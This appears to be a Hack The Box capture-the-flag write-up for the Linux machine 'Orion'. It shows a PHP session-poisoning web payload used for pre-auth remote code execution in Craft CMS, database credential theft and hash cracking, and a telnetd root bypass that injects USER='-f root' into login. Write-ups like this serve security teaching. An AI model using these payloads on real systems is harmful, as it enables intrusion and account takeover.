Orion
Hack The Box · Easy · Linux
Easy
Linux
User + Root owned
Machine Overview
Flags
Attack Chain
1. Reconnaissance
nmap -p- --min-rate 5000 → 22 (SSH) + 80 (nginx); port 80 redirects to orion.htb.
- Site is "Orion Telecom", Powered by CraftCMS (
X-Powered-By: Craft CMS). Admin panel at /admin shows Craft CMS 5.6.16 (vulnerable — patched in 5.6.17).
2. Initial Access — CVE-2025-32432 (Craft CMS pre-auth RCE)
- Craft CMS ≤ 5.6.16 is vulnerable to pre-auth RCE via the
assets/generate-transform image-transform endpoint (an "additional fix" for CVE-2023-41892, rooted in the Yii2 __class-over-class object-injection bug).
- Exploit chain (session poisoning →
PhpManager gadget):
1. GET /admin/login → grab CraftSessionId cookie + CRAFT_CSRF_TOKEN (the X-CSRF-Token value).
2. Poison the session file: GET /index.php?p=admin/dashboard&a=<?=file_put_contents('/var/www/html/craft/web/o.txt',shell_exec($_GET['cmd']));?> — Craft stores the (unauth) return URL in /var/lib/php/sessions/sess_<id>, embedding the raw PHP payload.
3. POST /index.php?p=actions/assets/generate-transform&cmd=<command> with a FieldLayoutBehavior→PhpManager gadget whose itemFile points at the poisoned session file → the session file is require()d and the payload runs shell_exec($_GET['cmd']), writing output to a web-readable file.
- RCE as www-data.
3. Credential Recovery
/var/www/html/craft/.env leaks DB creds: root / SuperSecureCraft123Pass! @ orion.
mysql → orion.users: single user admin / adam@orion.htb with bcrypt hash $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS.
- Cracked the hash →
darkangel (verified locally with bcrypt.checkpw).
4. Password Reuse → User Flag
- SSH as
adam / darkangel → user flag [REDACTED].
5. Privilege Escalation — telnetd Auth Bypass (CVE-2026-24061)
/etc/inetd.conf: telnet stream tcp nowait root /usr/local/sbin/telnetd telnetd (GNU inetutils ≤ 2.7, listening on 127.0.0.1:23).
- GNU inetutils
telnetd passes the client-supplied USER environment value unsanitized to login(1). Supplying USER=-f root makes telnetd invoke login -f root (pre-authenticated → root).
USER="-f root" telnet -a localhost
# root@orion:~# cat /root/root.txt
Techniques Demonstrated
- Craft CMS version fingerprinting (
X-Powered-By, admin footer)
- Pre-auth object-injection RCE (CVE-2025-32432 / Yii2
__class precedence)
- PHP session poisoning (return-URL side-channel) +
PhpManager gadget file inclusion
- Raw-URL payload delivery (space-free
<?=...?> to bypass HTTP client encoding)
.env database credential disclosure
- bcrypt hash extraction + cracking (password
darkangel)
- Credential reuse (DB user → system user
adam)
- telnetd authentication bypass (CVE-2026-24061,
-f root USER injection)
Tools Used
nmap, curl, Python 3 (requests/paramiko/bcrypt), custom CVE-2025-32432 exploit, mysql (target), telnet (target).
← all writeups